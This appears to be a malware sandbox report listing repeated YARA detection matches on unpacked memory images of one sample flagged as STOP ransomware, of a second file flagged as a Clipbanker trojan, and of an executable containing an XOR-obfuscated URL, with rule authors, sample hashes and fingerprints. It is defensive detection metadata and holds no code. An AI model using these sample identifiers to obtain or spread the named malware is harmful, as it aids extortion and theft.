Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
